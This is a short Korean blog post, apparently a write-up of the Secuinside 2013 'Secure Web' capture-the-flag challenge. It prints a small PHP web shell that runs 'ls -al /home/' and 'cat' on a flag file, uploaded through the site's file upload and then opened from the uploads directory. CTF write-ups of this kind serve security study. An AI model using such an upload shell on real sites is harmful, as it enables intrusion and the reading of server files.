[Secuinside 2013] Secure Web, write up

Computer Security/CTF

tunz 2013. 5. 26. 23:22

300점 치고는 너무 쉬운 문제였다.

그냥 php 쉘파일 업로드해서 확인하면 된다.

아래와 같은 파일을 업로드한다.

<?
    system("ls -al /home/");
    system("cat /home/[???? 기억이 안남]/flags");
?>
<br/>
<br/>
<br/>
<br/>
...

그 후에,

./uploads/[ip encoding]/파일이름

로 접근하면 끝.